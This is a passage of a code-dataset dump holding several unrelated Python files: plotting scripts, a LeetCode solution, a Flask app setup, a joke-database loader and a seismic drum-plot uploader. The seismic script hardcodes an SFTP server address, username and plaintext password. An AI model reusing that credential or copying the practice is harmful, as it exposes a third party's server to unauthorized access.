y**2)**0.5\n#------------------------------------------------------------------------------\nfig1=plt.figure('Obitial Velocity v.s. Distance ')\ntest_r = np.linspace(10*radius_sun,300*radius_sun,100)\nplt.scatter(test_r/radius_sun,vel(test_r))\n\nplt.title('Distance v.s. Orbital Velcoity')\nplt.xlabel('Distance from stellar surface [R0]')\nplt.ylabel('Orbital Velocity [m/s]')\nplt.axvline((AU/radius_sun),color='k', linestyle='--')\nplt.axhline(vel(AU),color='k', linestyle='--')\n#------------------------------------------------------------------------------\nfig2=plt.figure('Period v.s. Distance')\ntest_r = np.linspace(10*radius_sun,300*radius_sun,100)\nplt.scatter((test_r)/radius_sun,period(test_r)*sec_to_year)\nplt.title('Period v.s. Distance')\nplt.xlabel('Distance from stellar surface [R0]')\nplt.ylabel('Period [yrs]')\nplt.axvline((AU/radius_sun),color='k', linestyle='--')\nplt.axhline(period(AU)*sec_to_year,color='k', linestyle='--')\n#------------------------------------------------------------------------------\nfig3=plt.figure('Force v.s. Distance')\ntest_r = np.linspace(10*radius_sun,300*radius_sun,100)\nplt.scatter((test_r)/radius_sun,f_grav(test_r))\nplt.title('Force v.s. Distance')\nplt.xlabel('Distance from stellar surface [R0]')\nplt.ylabel('Force [N]')\nplt.axvline((AU/radius_sun),color='k', linestyle='--')\nplt.axhline(f_grav(AU),color='k', linestyle='--')\n#------------------------------------------------------------------------------\nfig4=plt.figure('Luminousity v.s. Distance')\ntest_r = np.linspace(10*radius_sun,300*radius_sun,100)\nplt.scatter((test_r)/radius_sun,flux(test_r))\nplt.scatter((test_r)/radius_sun,(0.46*flux(test_r)),color='r')\nplt.text(200,550000,'Efficeny of 46%',color='b') # <- https://www.google.ie/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=most%20efficent%20solar%20panels\nplt.text(200,500000,'Total Luminousity',color='r')\nplt.title('Luminousity v.s. Distance')\nplt.xlabel('Distance from stellar surface [R0]')\nplt.ylabel('Luminousity [J/s]')\nplt.axvline((AU/radius_sun),color='k', linestyle='--')\nplt.axhline(flux(AU),color='k', linestyle='--')\n\n","sub_path":"Dyson_sphere_data.py","file_name":"Dyson_sphere_data.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"400510527","text":"import numpy as np\n\n\ndef line2d_seg_dist(p1, p2, p0):\n \"\"\"distance(s) from line defined by p1 - p2 to point(s) p0\n\n p0[0] = x(s)\n p0[1] = y(s)\n\n intersection point p = p1 + u*(p2-p1)\n and intersection point lies within segment if u is between 0 and 1\n\n from matplotlib < 3.1\n \"\"\"\n\n x21 = p2[0] - p1[0]\n y21 = p2[1] - p1[1]\n x01 = np.asarray(p0[0]) - p1[0]\n y01 = np.asarray(p0[1]) - p1[1]\n\n u = (x01*x21 + y01*y21) / (x21**2 + y21**2)\n u = np.clip(u, 0, 1)\n d = np.hypot(x01 - u*x21, y01 - u*y21)\n\n return d\n\n","sub_path":"code/plotting_utils.py","file_name":"plotting_utils.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"426507112","text":"# -*- coding: utf-8 -*-\n\"\"\"\nMath 6702 Homework 3 Problem 9.6.8\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib as mpl\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\n\n# For drawing vector on 3D plot\nclass Arrow3D(FancyArrowPatch):\n def __init__(self, xs, ys, zs, *args, **kwargs):\n FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)\n self._verts3d = xs, ys, zs\n #\n\n def draw(self, renderer):\n xs3d, ys3d, zs3d = self._verts3d\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))\n FancyArrowPatch.draw(self, renderer)\n #\n#\n\n# Create spatial variables\nnPoints = 1000;\nx_1d = np.linspace(0.2, 2.9, nPoints);\ny_1d = np.linspace(0, 5, nPoints);\nx, y = np.meshgrid(x_1d, y_1d);\n\n# Create scalar field\nz = (y - 1)/np.sin(x);\n\n# Compute level curve value\nx0 = np.pi/6;\ny0 = 3/2;\nc = (y0 - 1)/np.sin(x0);\n\n# Set up figure\nfig = plt.figure(facecolor='white');\nax = fig.gca(projection='3d')\n\ntol = 0.0005;\nlevels = [ c - tol, c + tol ];\n\nmaxValue = 2;\n\nsurfacePlotHandle = ax.plot_surface(x, y, z, \\\n cmap='viridis', linewidth=0, antialiased=False );\n \n# Add in gradient vector\nx0 = np.pi/6;\ny0 = 3/2;\nz0 = 1;\nx1 = x0 + np.sqrt(3);\ny1 = y0 + 2;\nz1 = z0;\na = Arrow3D([x0, x1], [y0, y1], [z0, z1], mutation_scale=20, \n lw=3, arrowstyle=\"-|>\", color=\"k\")\nax.add_artist(a)\n\nax.text( x1 - 1.5, y1-1, z1, r'$\\nabla f$', None, fontsize=20 );\n\n# Plot level curve in x-y plane\nxLong = np.linspace(0, 3.5, 1000);\nlinePlotHandle = ax.plot( xLong, np.sin(xLong) + 1, 'k' );\n\nplt.ylim([0, 5]);\nplt.ylabel(r'$y$',fontsize=26, family='serif',labelpad=20);\nplt.yticks( fontsize=14, family='serif' );\n\nplt.xlim([0, np.pi]);\nplt.xlabel(r'$x$',fontsize=26, family='serif',labelpad=20);\nplt.xticks( [0, np.pi/4, np.pi/2, 3*np.pi/4, np.pi], \\\n [r'0', r'$\\pi/4$', r'$\\pi/2$', r'$3\\pi/4$', '$\\pi$'], \\\n fontsize=19, family='serif' );\n\nax.set_zlabel(r'$z$',fontsize=26, family='serif',labelpad=20);\n\nplt.show()\n","sub_path":"math6702/hw3/problem9.6.8.py","file_name":"problem9.6.8.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"207717141","text":"class Solution:\n def minDepth(self, root: TreeNode) -> int:\n \n def getChild(root: TreeNode) -> list:\n \tchild = []\n \tif root.left:\n \t\tchild.append(root.left)\n \tif root.right:\n \t\tchild.append(root.right)\n \treturn child\n\n if not root:\n return 0\n NodesInSameLevel = [root]\n\n level=0\n\n while NodesInSameLevel!=[]:\n \tlevel+=1\n \tfor i in range(len(NodesInSameLevel)-1, -1, -1):\n\t \tcurNode = NodesInSameLevel.pop(i)\n\t \tchild = getChild(curNode)\n\t \tif child == []:\n\t \t\treturn level\n\t \tNodesInSameLevel.extend(child)\n\n\t \n\n# Runtime: 48 ms, faster than 88.06% of Python3 online submissions for Minimum Depth of Binary Tree.\n# Memory Usage: 15.1 MB, less than 62.16% of Python3 online submissions for Minimum Depth of Binary Tree.","sub_path":"ALGO/111_Minimum_Depth_of_Binary_Tree.py","file_name":"111_Minimum_Depth_of_Binary_Tree.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"34622791","text":"# -*- coding: utf-8 -*-\nfrom salver.facts import Tweet, Username\nfrom salver.common.utils import get_actual_dir\nfrom salver.common.collectors import DockerCollector\n\n\nclass Twint(DockerCollector):\n config = {\n 'name': 'twint',\n 'docker': {'build_context': get_actual_dir()},\n }\n\n def callbacks(self):\n return {Username: self.scan}\n\n def scan(self, username):\n regex = r'(\\d+) (\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2}).*<.*> (.*)'\n\n data = self.run_container(command=['-u', username.name, '--retweets'])\n for tweet_id, date, content in self.findall_regex(data, regex):\n yield Tweet(id=tweet_id, content=content, date=date, rt=True)\n\n data = self.run_container(command=['-u', username.name])\n for tweet_id, date, content in self.findall_regex(data, regex):\n yield Tweet(id=tweet_id, content=content, date=date, rt=False)\n","sub_path":"salver/agent/collectors/twint/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"483848631","text":"def hello(name):\n\t'''\n\tReturns a greeting to the user\n\n\tIf no name is passed, let user know there's an issue\n\t'''\n\tif not name:\n\t\traise ValueError(\"Well, we didn't want to talk to you anyway!\")\n\n\treturn \"Hello, {}!\".format(name)\n\nif __name__ == \"__main__\":\n\tname = input(\"Enter your name: \")\n\tprint(hello(name))","sub_path":"01 Saying Hello/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"504835746","text":"import numpy as np\n\ndat = np.loadtxt('USA_girls_trimmed.dat', dtype=[('day','int'),('month','S10'),('year', 'int')])\n\nmonths=['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\nmo_num = np.arange(12)\n\nmo_dist = dat['day']*0-666\n\nfor i in np.arange(np.size(months)):\n good = np.where(dat['month'] == months[i])\n mo_dist[good] = mo_dist[good]*0+i\n\nhist(mo_dist, bins=12)\n","sub_path":"blargh/Code/Age_effects/Tennis/ql.py","file_name":"ql.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"121854512","text":"from observal import *\nfrom clientcomm_v1 import *\nfrom readgeneral_v2 import *\nfrom readgeneral_v2 import *\nfrom writegeneral_v2 import *\n\nclass AreaObserver:\n def __init__(self, observable):\n observable.register_observer(self)\n\n def notify(self, *args, **kwargs):\n for item in args[0]:\n item.analogprocess()\n\nclass analogprocess:\n\n def __init__(self,alldevices,filename):\n self.subject = Observable()\n self.observer = AreaObserver(self.subject)\n self.alldevices = alldevices\n self.client = Communication()\n self.sta_con_plc = self.client.opc_client_connect(filename)\n self.observer = AreaObserver(self.subject)\n self.readgeneral = ReadGeneral(self.sta_con_plc)\n\n\n def process(self):\n\n for item in range(len(self.alldevices.allanalogsignalobjects.listofanalogobjects)):\n self.alldevices.allanalogsignalobjects.listofanalogobjects[item].analogprocess()\n\n\ndef readkeyandvalues(alldevice):\n analogdictionary = alldevice.allanalogs.dictionary\n areas = list(analogdictionary.keys())\n\n n = 0\n while n < len(areas):\n area = areas[n]\n devices = analogdictionary[area]\n yield area, devices\n n = n + 1\n\n\n\n\n\n\n\n\n\n","sub_path":"RH2/RH2/allanalogprocessing.py","file_name":"allanalogprocessing.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"490819280","text":"import numpy as np\nimport cv2\n\nif __name__ == '__main__':\n # http://www.opencv.org.cn/opencvdoc/2.3.2/html/doc/tutorials/imgproc/erosion_dilatation/erosion_dilatation.html\n\n img = cv2.imread(\n '/Users/zezzhang/Workspace/img2tags_serving/image_prediction/data/A/train/image/id_00000001_856.jpg'\n )\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n # initialize OpenCV's static fine grained saliency detector and\n # compute the saliency map\n saliency = cv2.saliency.StaticSaliencyFineGrained_create()\n (success, saliencyMap) = saliency.computeSaliency(gray)\n saliencyMap = (saliencyMap * 255).astype(\"uint8\")\n\n cv2.imshow('saliencyMap', saliencyMap)\n\n blur = cv2.GaussianBlur(saliencyMap, (5, 5), 0)\n cv2.imshow('blur', blur)\n\n # noise removal\n kernel = np.ones((3, 3), np.uint8)\n opening = cv2.morphologyEx(blur, cv2.MORPH_OPEN, kernel, iterations=2) # 形态开运算\n cv2.imshow('opening', opening)\n\n # sure background area\n sure_bg = cv2.dilate(opening, kernel, iterations=3)\n cv2.imshow('sure_bg', sure_bg)\n\n # Finding sure foreground area\n dist_transform = cv2.distanceTransform(opening, cv2.DIST_L2, 5)\n _, sure_fg = cv2.threshold(dist_transform, 0.7 * dist_transform.max(), 255, cv2.THRESH_BINARY)\n\n cv2.imshow('sure_fg', sure_fg)\n\n # Finding unknown region\n sure_fg = np.uint8(sure_fg)\n unknown = cv2.subtract(sure_bg, sure_fg)\n\n # Marker labelling\n _, markers = cv2.connectedComponents(sure_fg)\n # Add one to all labels so that sure background is not 0, but 1\n markers = markers + 1\n # Now, mark the region of unknown with zero\n markers[unknown == 255] = 0\n\n markers = cv2.watershed(img, markers)\n img[markers <= 1] = [255, 255, 255]\n\n cv2.imshow('img', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","sub_path":"image_prediction/color/learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"131491266","text":"import sqlite3 as sq\nimport html\n\ndef createTagTable():\n '''\n 创建标签表\n '''\n db = sq.connect('./jokes.db')\n try:\n db.execute('create table tagTab (tag varchar(20) primary key, backup varchar(20) null)')\n # 除了标签名之外, 还有一个备用的column\n except:\n # 如果数据库中已有该表, 则直接退出\n db.rollback()\n return\n db.commit()\n \ndef createJokeTable():\n '''\n 创建笑话表\n '''\n db = sq.connect('./jokes.db')\n try:\n # 包括序号, 标题, 内容\n db.execute('create table jokeTab (jokeNo integer, title varchar(20) null, content varchar(20), primary key(jokeNo))')\n except:\n # 如果数据库中已有该表, 则直接退出\n db.rollback()\n return\n db.commit()\n\ndef createJokeTagTable():\n '''\n 创建笑话和标签的关联表格\n '''\n db = sq.connect('./jokes.db')\n try:\n # 包括笑话序号和标签名\n db.execute('create table jokeTagTab (jokeNo integer, tag varchar(20), primary key (jokeNo, tag), foreign key(jokeNo) references jokeTab(jokeNo), foreign key(tag) references tagTab(tag))')\n except:\n # 如果数据库中已有该表, 则直接退出\n db.rollback()\n return\n db.commit()\n\ndef createDB():\n '''\n 数据库创建\n '''\n createTagTable()\n createJokeTable()\n createJokeTagTable()\n\n\ndef readFile_dsk(fileName):\n '''\n 从杜世康学长哪里拷来的数据处理\n '''\n db = sq.connect('./jokes.db')\n # 确定当前已存储的笑话数, 以便确定初始序号\n cu = db.cursor()\n cu.execute('select count(jokeNo) from jokeTab')\n jokeCount = cu.fetchone()[0]\n fileIn = open(fileName, 'r', encoding = 'utf-16')\n while True:\n line = fileIn.readline()\n # 文件结尾退出\n if len(line) == 0:\n break\n \n # 把制表符转换为空格\n line = line.replace('\\t', ' ')\n # 消去行中的html标签\n line = line.replace('', '')\n line = line.replace('
', '')\n # 转换行中的html entity\n line = html.unescape(line)\n # 居然还有全角空格\n line = line.replace('\\u3000', '')\n # 把单引号换成sql中的转移单引号\n line = line.replace('\\'', '\\'\\'')\n splitStrBySpace = line.split(' ')\n if '\\\\' in line:\n # 出现了奇怪的东西, 因为这些东西不多, 所以直接抛弃掉这些数据就好\n # 抛弃掉的时候要收集数据, 可以把输出重定向到一个文件\n print('detected \\\\ in the line:')\n print(line)\n continue\n \n # 从行中读取笑话标题, 标签等数据\n title = splitStrBySpace[1]\n tag = splitStrBySpace[-1]\n content = ''\n for word in splitStrBySpace[2:-1]:\n content += word\n \n # 检查标签是不是被添加过了\n cu.execute('select tag from tagTab where tag = \\'%s\\'' %tag)\n result = cu.fetchall()\n if len(result) != 1:\n # 插入标签数据\n try:\n db.execute('insert into tagTab values (\\'%s\\', %d)' %(tag, 0))\n except:\n # 如果出现意外, 忽略错误, 执行回滚, 抛弃这组数据同时把错误数据输出\n db.rollback()\n print ('db exception')\n print (line)\n continue\n try:\n # 插入笑话内容和关联数据\n db.execute('insert into jokeTab values (%d, \\'%s\\', \\'%s\\' )' %(jokeCount, title, content))\n db.execute('insert into jokeTagTab values (%d, \\'%s\\')' % (jokeCount, tag))\n except:\n # 如果出现意外, 忽略错误, 执行回滚, 抛弃这组数据同时把错误数据输出\n db.rollback()\n print ('db exception')\n print (line)\n continue\n db.commit()\n jokeCount += 1\n fileIn.close()\n\ndef readFile_yyj(fileName):\n '''\n 从叶亚杰学长哪里拷来的数据处理\n '''\n db = sq.connect('./jokes.db')\n # 确定当前已存储的笑话数, 以便确定初始序号\n cu = db.cursor()\n cu.execute('select count(jokeNo) from jokeTab')\n jokeCount = cu.fetchone()[0]\n fileIn = open(fileName, 'r')\n\n while True:\n line = fileIn.readline()\n # 文件结尾退出\n if len(line) == 0:\n break\n # 空行直接跳过\n elif len(line) == 1:\n continue\n # 网址行, 直接跳过\n elif 'http' in line:\n continue\n\n content = line\n content = content.replace('\\'', '\\'\\'')\n content = content.replace('\\\\', '')\n tagLine = fileIn.readline()\n\n try:\n db.execute('insert into jokeTab values (%d, \\'%s\\', \\'%s\\')' % (jokeCount, '', content))\n except:\n # 如果出现意外, 忽略错误, 执行回滚, 抛弃这组数据同时把错误数据输出\n print('db exception while adding content:')\n print (content)\n continue\n\n if(len(tagLine) < 5):\n # 我没有查看所有数据, 不过标签太短肯定有问题, 所以直接报错\n print('tag line is too short:')\n print (content)\n print (tagLine)\n db.rollback()\n continue\n \n tags = tagLine.split(' ')\n \n for tag in tags[1:]:\n # 检查标签是不是已经在表中\n cu.execute('select tag from tagTab where tag = \\'%s\\'' %tag)\n result = cu.fetchall()\n if len(result) != 1:\n try:\n # 插入标签和关联数据\n db.execute('insert into tagTab values (\\'%s\\', %d)' %(tag, 0))\n db.execute('insert into jokeTagTab values (%d, \\'%s\\')' % (jokeCount, tag))\n except:\n # 如果出现意外, 忽略错误, 执行回滚, 抛弃这组数据同时把错误数据输出\n db.rollback()\n print ('db exception while adding tag:')\n print (tag)\n break\n else:\n db.commit()\n jokeCount += 1\n fileIn.close()\n\ncreateDB()\nreadFile_dsk('dskData')\n ","sub_path":"dataClarity/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"298657577","text":"\n\n#sudo ./slarchive -v -SDS /mnt/ide/seed/ -x statefile -S LK_BRK?:EH? 172.16.8.10:18000\n\n#openvpn --config clientBRASKEM__GEOAPP.con\n#\n# #sudo sshfs -o allow_other braskem@80.211.98.179:/uploads /mnt/geoAppServer/\nimport os\nfrom obspy import UTCDateTime\nfrom obspy.clients.seedlink.easyseedlink import EasySeedLinkClient\nfrom obspy.core.stream import Stream\nfrom obspy import read\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nfrom obspy import read_inventory\n\nfrom threading import Thread\n\nimport json\n\nimport time\nimport paramiko\n\n\ndpi = 100\nsizex = 800\nsizey = 600\nyRange = 0.1\n\nhystType = [1440, 360, 180, 60]\n\nband = {\n 'low': [1, 20],\n 'high': [20, 50]\n}\n\nrTWindow = 360\nrtSft = 2\n\n#inv = read_inventory(\"metadata/Braskem_metadata.xml\")\n\n\n\n\nclass drumPlot(EasySeedLinkClient):\n _traces =Stream()\n _inv = read_inventory(\"metadata/Braskem_metadata.xml\")\n _rtSft = rtSft\n _lastData = UTCDateTime.now()\n _traces = Stream()\n _appTrace = Stream()\n _drTrace =Stream()\n _drHTrace = Stream()\n _rTWindow = rTWindow\n _tEnd=UTCDateTime.now()\n _tNow = UTCDateTime.now()\n _rtRunning=False\n _hyRunning=False\n _saving=False\n _status={}\n\n def statusCalc(self):\n for tr in self._traces:\n id=tr.get_id()\n l=int(UTCDateTime.now()-tr.stats['endtime'])\n station=id.split('.')[1]\n self._status[station]={}\n self._status[station][\"Noise Level\"]=\"---\"\n self._status[station][\"Latency\"]= str(l)+'s'\n self._status[station][\"Voltage\"]=\"---\"\n self._status[station][\"Color\"]= \"#FF0000\"\n with open('geophone_network_status.json', 'w') as fp:\n json.dump(self._status, fp)\n sftp.put('geophone_network_status.json', 'uploads/RT/' + 'geophone_network_status.json')\n\n def singleStatusCalc(self,tr):\n id = tr.get_id()\n station = id.split('.')[1]\n l = int(UTCDateTime.now() - tr.stats['endtime'])\n self._status[station] = {}\n self._status[station][\"Noise Level\"] = \"---\"\n self._status[station][\"Latency\"] = str(l) + 's'\n self._status[station][\"Voltage\"] = \"---\"\n self._status[station][\"Color\"] = \"#FF0000\"\n\n def plotDrum(self, trace,filename='tmp.png'):\n #trace.resample(50)\n try:\n #self._appTrace.data = self._appTrace.data * 1000#/3.650539e+08\n trace.data=trace.data*1000\n im = trace.plot(type='dayplot',\n dpi=dpi,\n x_labels_size=int(8 * 100 / int(dpi)),\n y_labels_size=int(8 * 100 / int(dpi)),\n title_size=int(1000 / int(dpi)),\n title=self._tEnd.strftime(\"%Y/%m/%d\"),\n size=(sizex, sizey),\n color=('#AF0000', '#00AF00', '#0000AF'),\n # right_vertical_labels=True,\n\n vertical_scaling_range=yRange,\n # transparent=True,\n handle=True,\n time_offset=-3,\n data_unit='mm/s'\n # bgcolor='black',\n # grid_color='white',\n # face_color='black',+\n # show_y_UTC_label=False,\n # outfile='tmp.png'\n )\n im.savefig(filename)\n plt.close(im)\n\n return True\n except:\n print('ops,something wrong in plotting!!')\n return False\n\n def realTimeDrumPlot(self):\n print('start ' + UTCDateTime.now().strftime(\"%Y%m%d %H%M%S\"))\n appTrace=Stream()\n self._rtRunning=True\n for tr in self._traces:\n id = tr.get_id()\n spl = id.split('.')\n network = spl[0]\n station = spl[1]\n channel = spl[3]\n l = int(self._tEnd - tr.stats['endtime'])\n self._status[station] = {}\n self._status[station][\"Noise Level\"] = \"---\"\n self._status[station][\"Latency\"] = str(l) + 's'\n self._status[station][\"Voltage\"] = \"---\"\n self._status[station][\"Color\"] = \"#FF0000\"\n\n for b in band:\n fileNameRT = 'RT_' + network + '_' + station + '_' + channel + '_' + str(b) + '.png'\n appTrace = tr.copy()\n bb = band[b]\n appTrace.trim(self._tEnd - self._rTWindow * 60, self._tEnd,pad=True,fill_value=0)\n appTrace.filter('bandpass', freqmin=bb[0], freqmax=bb[1], corners=2, zerophase=True)\n if self.plotDrum(appTrace):\n sftpMkdirs(sftp, '/RT/', 'uploads')\n sftp.put('tmp.png', 'uploads/RT/' + fileNameRT)\n #print(fileNameRT)\n with open('geophone_network_status.json', 'w') as fp:\n json.dump(self._status, fp)\n sftp.put('geophone_network_status.json', 'uploads/RT/' + 'geophone_network_status.json')\n print('end '+UTCDateTime.now().strftime(\"%Y%m%d %H%M%S\"))\n self._rtRunning=False\n\n def hystDrumPlot(self):\n print('Hyststart ' + UTCDateTime.now().strftime(\"%Y%m%d %H%M%S\"))\n appTrace=Stream()\n self._hyRunning=True\n\n for tr in self._traces:\n id = tr.get_id()\n #print('hyst '+id)\n spl = id.split('.')\n network = spl[0]\n station = spl[1]\n channel = spl[3]\n\n\n for h in hystType:\n\n if self._tEnd.hour % int(h / 60) == 0:\n for b in band:\n tStart = self._tEnd - h * 60\n p = network + '/' + station + '/' + channel + '/' + str(self._tEnd.year) + '/' + str(\n self._tEnd.month) + '/' + str(\n self._tEnd.day) + '/' + str(h) + '/' + str(b)\n\n fileName = p + '/' + tStart.strftime(\"%Y%m%d%H%M\") + '_' + self._tEnd.strftime(\n \"%Y%m%d%H%M\") + '.png'\n\n appTrace = tr.copy()\n bb = band[b]\n appTrace.trim(tStart, self._tEnd,pad=True,fill_value=0)\n appTrace.filter('bandpass', freqmin=bb[0], freqmax=bb[1], corners=2, zerophase=True)\n if self.plotDrum(appTrace,'tmpH.png'):\n sftpMkdirs(sftp, p, 'uploads')\n sftp.put('tmpH.png', 'uploads/' + fileName)\n #print(fileName)\n print('Hystend ' + UTCDateTime.now().strftime(\"%Y%m%d %H%M%S\"))\n self._hyRunning=False\n\n def align(self):\n if os.path.exists('traces.mseed'):\n self._traces = read('traces.mseed')\n return True\n\n def save(self):\n self._saving=True\n tr=self._traces.copy()\n print('saving')\n tr.write('traces.mseed')\n print('saved')\n self._saving=False\n\n def on_data(self,traces):\n self._tNow = UTCDateTime.now()\n traces.remove_response(self._inv)\n #traces.resample(125)\n self._traces += traces\n self._traces.merge(fill_value=0)\n\n # print(self._tNow.strftime((\"%Y-%m-%d %H:%M:%S\")) +' rtThread'+str(self._rtRunning))\n\n\n if (self._tNow.minute % self._rtSft == 0) & (self._lastData.minute % self._rtSft != 0):\n self._tEnd=self._tNow\n self._traces.trim(self._tEnd - 720 * 60, self._tNow)\n print(self._traces)\n if not self._rtRunning:\n rtThread = Thread(target=self.realTimeDrumPlot)\n rtThread.start()\n if not self._saving:\n sThread=Thread(target=self.save)\n sThread.start()\n\n if (self._tEnd.minute == 0) & (self._lastData.minute != 0):\n self._tEnd = self._tNow\n if not self._hyRunning:\n hyThread = Thread(target=self.hystDrumPlot)\n hyThread.start()\n # # self.hystDrumPlot()\n\n self._lastData = self._tNow\n\n\ndef sftpExist(p, path):\n try:\n p.stat(path)\n return True\n\n except IOError:\n return False\n\n\ndef sftpMkdirs(p, path, basePath):\n dirs = path.split('/')\n parPath = basePath\n for dir in dirs:\n parPath += '/' + dir\n if not sftpExist(p, parPath):\n p.mkdir(parPath)\n\n\n\nssh_client = paramiko.SSHClient()\nssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nssh_client.connect(hostname='80.211.98.179', username='braskem', password='Geoapp2020!',timeout=5)\nsftp = ssh_client.open_sftp()\nclient = drumPlot('172.16.8.10')\nclient.select_stream('LK', 'BRK?', 'E??')\nclient.align()\nclient.run()\n","sub_path":"drumPlotHyst_1.2.py","file_name":"drumPlotHyst_1.2.py","file_ext":"py","file_size_in_byte":8986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"598541281","text":"from collections import defaultdict\nclass Solution(object):\n def subarraysDivByK(self, A, K):\n if len(A) == 1:\n if not A[0] % K: return 1\n else: return 0\n hashmap = {}\n hashmap[0] = 1\n value = 0\n res = 0\n for i in range(len(A)):\n value += A[i]\n key = value % K\n if key in hashmap:\n res += hashmap[key]\n hashmap[key] = hashmap.get(key,0) + 1\n return res\n\n","sub_path":"TestEveryday/lc974.py","file_name":"lc974.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"367645107","text":"import logging\nimport os\nimport yaml\nimport time\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom .models import db\nfrom .controller import routes, helpers, errors\n\nlogger = logging.getLogger(__name__)\n\ndef create_app(debug=False, raise_errors=False):\n app = Flask(__name__)\n\n # set debug mode\n app.debug = debug\n\n # raise app errors\n app.config['RAISE_ERRORS'] = raise_errors\n\n # register default encoder\n app.json_encoder = helpers.JSONEncoder\n\n # register error handler\n errors.register_error_handlers(app)\n\n # configure logging\n configure_logging(debug=debug)\n\n # configure app\n configure_flask(app=app)\n\n # bind database\n db.init_app(app)\n\n # register blueprints\n app.register_blueprint(routes.health_check.bp, url_prefix='')\n app.register_blueprint(routes.auth.bp, url_prefix='/auth')\n app.register_blueprint(routes.user.bp, url_prefix='/user')\n app.register_blueprint(routes.team.bp, url_prefix='/team')\n app.register_blueprint(routes.tag.bp, url_prefix='/tag')\n app.register_blueprint(routes.post.bp, url_prefix='/post')\n app.register_blueprint(routes.search.bp, url_prefix='/search')\n\n # Configure CORS\n CORS(app,origins=['*'])\n\n return app\n\n\ndef configure_flask(app):\n assert 'FLASK_CONFIG' in os.environ, 'missing FLASK_CONFIG in environment'\n fp = os.environ.get('FLASK_CONFIG')\n\n assert os.path.exists(fp), 'CANNOT FIND FLASK CONFIG \"{fp}\"'.format(fp=fp)\n\n # assert, 'bad flask config \"fp\"'\n logger.debug('reading config \"{fp}\"'.format(fp=fp))\n\n with open(fp, 'r') as f:\n conf_obj = yaml.load(f)\n\n app.config['AUTH_TOKEN_EXP'] = conf_obj.get('token_exp') or 60*60*24\n app.config['APP_START_TIME'] = time.time()\n app.config['SECRET_KEY'] = conf_obj['secret_key']\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n app.config['SQLALCHEMY_POOL_RECYCLE'] = 3600 # reset db connections after an hour\n app.config['EXTERNAL_URL'] = conf_obj['external_url']\n # app.config['SERVER_NAME'] = conf_obj['external_url']\n app.config['SQLALCHEMY_DATABASE_URI'] = conf_obj['db']['url']\n app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False\n\n\ndef configure_logging(debug=False):\n h = logging.StreamHandler()\n fmt = logging.Formatter(\n fmt='%(asctime)s %(levelname)s (%(name)s) %(message)s',\n datefmt='%Y-%m-%dT%H:%M:%S'\n )\n h.setFormatter(fmt)\n\n root = logging.getLogger()\n root.addHandler(h)\n\n if debug:\n root.setLevel(logging.DEBUG)\n else:\n root.setLevel(logging.INFO)\n\ndef get_rules():\n app = create_app()\n with app.app_context():\n endpoints = []\n for rule in app.url_map.iter_rules():\n endpoints.append(rule.rule)\n endpoints.sort()\n return endpoints\n\ndef reset_db():\n app = create_app()\n with app.app_context():\n logger.info('dropping tables')\n db.drop_all()\n logger.info('creating tables')\n db.create_all()\n\ndef create_db():\n app = create_app()\n with app.app_context():\n logger.info('creating tables')\n db.create_all()\n","sub_path":"server/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
